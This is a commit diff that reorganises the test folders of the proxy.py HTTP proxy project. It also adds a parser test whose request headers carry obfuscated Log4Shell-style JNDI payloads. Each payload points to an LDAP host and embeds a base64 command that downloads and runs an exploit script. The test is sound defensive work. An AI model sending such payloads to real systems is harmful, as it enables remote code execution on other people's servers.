abhinavsingh
diff --git a/‎setup.cfg
Lines changed: 1 addition & 1 deletion b/‎setup.cfg
Lines changed: 1 addition & 1 deletion
diff --git a/‎tests/http/parser/__init__.py
Lines changed: 10 additions & 0 deletions b/‎tests/http/parser/__init__.py
Lines changed: 10 additions & 0 deletions
diff --git a/‎tests/http/test_chunk_parser.py renamed to ‎tests/http/parser/test_chunk_parser.py b/‎tests/http/test_chunk_parser.py renamed to ‎tests/http/parser/test_chunk_parser.py
diff --git a/‎tests/http/test_http_parser.py renamed to ‎tests/http/parser/test_http_parser.py
Lines changed: 48 additions & 0 deletions b/‎tests/http/test_http_parser.py renamed to ‎tests/http/parser/test_http_parser.py
Lines changed: 48 additions & 0 deletions
diff --git a/‎tests/http/test_proxy_protocol.py renamed to ‎tests/http/parser/test_proxy_protocol.py b/‎tests/http/test_proxy_protocol.py renamed to ‎tests/http/parser/test_proxy_protocol.py
diff --git a/‎tests/http/test_tls_parser.py renamed to ‎tests/http/parser/test_tls_parser.py b/‎tests/http/test_tls_parser.py renamed to ‎tests/http/parser/test_tls_parser.py
diff --git a/‎tests/http/tls_server_hello.data renamed to ‎tests/http/parser/tls_server_hello.data b/‎tests/http/tls_server_hello.data renamed to ‎tests/http/parser/tls_server_hello.data
diff --git a/‎tests/http/proxy/__init__.py
Lines changed: 10 additions & 0 deletions b/‎tests/http/proxy/__init__.py
Lines changed: 10 additions & 0 deletions
diff --git a/‎tests/http/test_http2.py renamed to ‎tests/http/proxy/test_http2.py b/‎tests/http/test_http2.py renamed to ‎tests/http/proxy/test_http2.py
diff --git a/‎tests/http/test_http_proxy.py renamed to ‎tests/http/proxy/test_http_proxy.py b/‎tests/http/test_http_proxy.py renamed to ‎tests/http/proxy/test_http_proxy.py
diff --git a/‎tests/http/test_http_proxy_tls_interception.py renamed to ‎tests/http/proxy/test_http_proxy_tls_interception.py
Lines changed: 1 addition & 1 deletion b/‎tests/http/test_http_proxy_tls_interception.py renamed to ‎tests/http/proxy/test_http_proxy_tls_interception.py
Lines changed: 1 addition & 1 deletion
diff --git a/‎tests/http/web/__init__.py
Lines changed: 10 additions & 0 deletions b/‎tests/http/web/__init__.py
Lines changed: 10 additions & 0 deletions
diff --git a/‎tests/http/test_web_server.py renamed to ‎tests/http/web/test_web_server.py
Lines changed: 58 additions & 58 deletions b/‎tests/http/test_web_server.py renamed to ‎tests/http/web/test_web_server.py
Lines changed: 58 additions & 58 deletions
diff --git a/‎tests/http/websocket/__init__.py
Lines changed: 10 additions & 0 deletions b/‎tests/http/websocket/__init__.py
Lines changed: 10 additions & 0 deletions
diff --git a/‎tests/http/test_websocket_client.py renamed to ‎tests/http/websocket/test_websocket_client.py b/‎tests/http/test_websocket_client.py renamed to ‎tests/http/websocket/test_websocket_client.py
diff --git a/‎tests/http/test_websocket_frame.py renamed to ‎tests/http/websocket/test_websocket_frame.py b/‎tests/http/test_websocket_frame.py renamed to ‎tests/http/websocket/test_websocket_frame.py
diff --git a/‎tests/test_main.py
Lines changed: 3 additions & 3 deletions b/‎tests/test_main.py
Lines changed: 3 additions & 3 deletions
@@ -121,4 +121,4 @@ exclude =
   tests.*
 
 [codespell]
-skip = tests/http/tls_server_hello.data
+skip = tests/http/parser/tls_server_hello.data
@@ -0,0 +1,10 @@
+# -*- coding: utf-8 -*-
+"""
+    proxy.py
+    ~~~~~~~~
+    ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on
+    Network monitoring, controls & Application development, testing, debugging.
+
+    :copyright: (c) 2013-present by Abhinav Singh and contributors.
+    :license: BSD, see LICENSE for more details.
+"""
@@ -763,3 +763,51 @@ def test_proxy_protocol_not_for_response_parser(self) -> None:
                 httpParserTypes.RESPONSE_PARSER,
                 enable_proxy_protocol=True,
             )
+
+    def test_is_safe_against_malicious_requests(self) -> None:
+        self.parser.parse(
+            b'GET / HTTP/1.1\r\n' +
+            b'Host: 34.131.9.210:443\r\n' +
+            b'User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' +
+            b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' +
+            b'Content-Type: application/x-www-form-urlencoded\r\n' +
+            b'nReferer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' +
+            b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' +
+            b'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}' +
+            b'://198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' +
+            b'Cookie: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' +
+            b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}' +
+            b'\r\n\r\n',
+        )
+        self.assertEqual(
+            self.parser.header(b'user-agent'),
+            b'${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' +
+            b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}',
+        )
+        self.assertEqual(
+            self.parser.header(b'content-type'),
+            b'application/x-www-form-urlencoded',
+        )
+        self.assertEqual(
+            self.parser.header(b'nreferer'),
+            b'${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' +
+            b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}',
+        )
+        self.assertEqual(
+            self.parser.header(b'X-Api-Version'),
+            b'${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}' +
+            b'://198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}',
+        )
+        self.assertEqual(
+            self.parser.header(b'cookie'),
+            b'${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' +
+            b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}',
+        )
@@ -0,0 +1,10 @@
+# -*- coding: utf-8 -*-
+"""
+    proxy.py
+    ~~~~~~~~
+    ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on
+    Network monitoring, controls & Application development, testing, debugging.
+
+    :copyright: (c) 2013-present by Abhinav Singh and contributors.
+    :license: BSD, see LICENSE for more details.
+"""
@@ -26,7 +26,7 @@
 from proxy.http.responses import PROXY_TUNNEL_ESTABLISHED_RESPONSE_PKT
 from proxy.core.connection import TcpClientConnection, TcpServerConnection
 from proxy.common.constants import DEFAULT_CA_FILE
-from ..test_assertions import Assertions
+from ...test_assertions import Assertions
 
 
 class TestHttpProxyTlsInterception(Assertions):
 
@@ -0,0 +1,10 @@
+# -*- coding: utf-8 -*-
+"""
+    proxy.py
+    ~~~~~~~~
+    ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on
+    Network monitoring, controls & Application development, testing, debugging.
+
+    :copyright: (c) 2013-present by Abhinav Singh and contributors.
+    :license: BSD, see LICENSE for more details.
+"""
@@ -28,7 +28,7 @@
 from proxy.common.constants import (
     CRLF, PROXY_PY_DIR, PLUGIN_PAC_FILE, PLUGIN_HTTP_PROXY, PLUGIN_WEB_SERVER,
 )
-from ..test_assertions import Assertions
+from ...test_assertions import Assertions
 
 
 PAC_FILE_PATH = os.path.join(
@@ -72,65 +72,65 @@ def mock_selector_for_client_read(self: Any) -> None:
         ),
     ]
 
-    # @mock.patch('socket.fromfd')
-    # def test_on_client_connection_called_on_teardown(
-    #         self, mock_fromfd: mock.Mock,
-    # ) -> None:
-    #     flags = FlagParser.initialize(threaded=True)
-    #     plugin = mock.MagicMock()
-    #     flags.plugins = {b'HttpProtocolHandlerPlugin': [plugin]}
-    #     self._conn = mock_fromfd.return_value
-    #     self.protocol_handler = HttpProtocolHandler(
-    #         TcpClientConnection(self._conn, self._addr),
-    #         flags=flags,
-    #     )
-    #     self.protocol_handler.initialize()
-    #     plugin.assert_called()
-    #     with mock.patch.object(self.protocol_handler, '_run_once') as mock_run_once:
-    #         mock_run_once.return_value = True
-    #         self.protocol_handler.run()
-    #     self.assertTrue(self._conn.closed)
-    #     plugin.return_value.on_client_connection_close.assert_called()
+# @mock.patch('socket.fromfd')
+# def test_on_client_connection_called_on_teardown(
+#         self, mock_fromfd: mock.Mock,
+# ) -> None:
+#     flags = FlagParser.initialize(threaded=True)
+#     plugin = mock.MagicMock()
+#     flags.plugins = {b'HttpProtocolHandlerPlugin': [plugin]}
+#     self._conn = mock_fromfd.return_value
+#     self.protocol_handler = HttpProtocolHandler(
+#         TcpClientConnection(self._conn, self._addr),
+#         flags=flags,
+#     )
+#     self.protocol_handler.initialize()
+#     plugin.assert_called()
+#     with mock.patch.object(self.protocol_handler, '_run_once') as mock_run_once:
+#         mock_run_once.return_value = True
+#         self.protocol_handler.run()
+#     self.assertTrue(self._conn.closed)
+#     plugin.return_value.on_client_connection_close.assert_called()
 
-    # @mock.patch('socket.fromfd')
-    # def test_on_client_connection_called_on_teardown(
-    #         self, mock_fromfd: mock.Mock,
-    # ) -> None:
-    #     flags = FlagParser.initialize(threaded=True)
-    #     plugin = mock.MagicMock()
-    #     flags.plugins = {b'HttpProtocolHandlerPlugin': [plugin]}
-    #     self._conn = mock_fromfd.return_value
-    #     self.protocol_handler = HttpProtocolHandler(
-    #         TcpClientConnection(self._conn, self._addr),
-    #         flags=flags,
-    #     )
-    #     self.protocol_handler.initialize()
-    #     plugin.assert_called()
-    #     with mock.patch.object(self.protocol_handler, '_run_once') as mock_run_once:
-    #         mock_run_once.return_value = True
-    #         self.protocol_handler.run()
-    #     self.assertTrue(self._conn.closed)
-    #     plugin.return_value.on_client_connection_close.assert_called()
+# @mock.patch('socket.fromfd')
+# def test_on_client_connection_called_on_teardown(
+#         self, mock_fromfd: mock.Mock,
+# ) -> None:
+#     flags = FlagParser.initialize(threaded=True)
+#     plugin = mock.MagicMock()
+#     flags.plugins = {b'HttpProtocolHandlerPlugin': [plugin]}
+#     self._conn = mock_fromfd.return_value
+#     self.protocol_handler = HttpProtocolHandler(
+#         TcpClientConnection(self._conn, self._addr),
+#         flags=flags,
+#     )
+#     self.protocol_handler.initialize()
+#     plugin.assert_called()
+#     with mock.patch.object(self.protocol_handler, '_run_once') as mock_run_once:
+#         mock_run_once.return_value = True
+#         self.protocol_handler.run()
+#     self.assertTrue(self._conn.closed)
+#     plugin.return_value.on_client_connection_close.assert_called()
 
-    # @mock.patch('socket.fromfd')
-    # def test_on_client_connection_called_on_teardown(
-    #         self, mock_fromfd: mock.Mock,
-    # ) -> None:
-    #     flags = FlagParser.initialize(threaded=True)
-    #     plugin = mock.MagicMock()
-    #     flags.plugins = {b'HttpProtocolHandlerPlugin': [plugin]}
-    #     self._conn = mock_fromfd.return_value
-    #     self.protocol_handler = HttpProtocolHandler(
-    #         TcpClientConnection(self._conn, self._addr),
-    #         flags=flags,
-    #     )
-    #     self.protocol_handler.initialize()
-    #     plugin.assert_called()
-    #     with mock.patch.object(self.protocol_handler, '_run_once') as mock_run_once:
-    #         mock_run_once.return_value = True
-    #         self.protocol_handler.run()
-    #     self.assertTrue(self._conn.closed)
-    #     plugin.return_value.on_client_connection_close.assert_called()
+# @mock.patch('socket.fromfd')
+# def test_on_client_connection_called_on_teardown(
+#         self, mock_fromfd: mock.Mock,
+# ) -> None:
+#     flags = FlagParser.initialize(threaded=True)
+#     plugin = mock.MagicMock()
+#     flags.plugins = {b'HttpProtocolHandlerPlugin': [plugin]}
+#     self._conn = mock_fromfd.return_value
+#     self.protocol_handler = HttpProtocolHandler(
+#         TcpClientConnection(self._conn, self._addr),
+#         flags=flags,
+#     )
+#     self.protocol_handler.initialize()
+#     plugin.assert_called()
+#     with mock.patch.object(self.protocol_handler, '_run_once') as mock_run_once:
+#         mock_run_once.return_value = True
+#         self.protocol_handler.run()
+#     self.assertTrue(self._conn.closed)
+#     plugin.return_value.on_client_connection_close.assert_called()
 
 
 class TestWebServerPluginWithPacFilePlugin(Assertions):
 
@@ -0,0 +1,10 @@
+# -*- coding: utf-8 -*-
+"""
+    proxy.py
+    ~~~~~~~~
+    ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on
+    Network monitoring, controls & Application development, testing, debugging.
+
+    :copyright: (c) 2013-present by Abhinav Singh and contributors.
+    :license: BSD, see LICENSE for more details.
+"""
@@ -28,9 +28,9 @@
     DEFAULT_OPEN_FILE_LIMIT, DEFAULT_DEVTOOLS_WS_PATH,
     DEFAULT_ENABLE_DASHBOARD, PLUGIN_DEVTOOLS_PROTOCOL,
     DEFAULT_ENABLE_WEB_SERVER, DEFAULT_DISABLE_HTTP_PROXY,
-    DEFAULT_CA_SIGNING_KEY_FILE, DEFAULT_CLIENT_RECVBUF_SIZE,
-    DEFAULT_SERVER_RECVBUF_SIZE, DEFAULT_ENABLE_STATIC_SERVER, PLUGIN_WEBSOCKET_TRANSPORT,
-    _env_threadless_compliant,
+    PLUGIN_WEBSOCKET_TRANSPORT, DEFAULT_CA_SIGNING_KEY_FILE,
+    DEFAULT_CLIENT_RECVBUF_SIZE, DEFAULT_SERVER_RECVBUF_SIZE,
+    DEFAULT_ENABLE_STATIC_SERVER, _env_threadless_compliant,
 )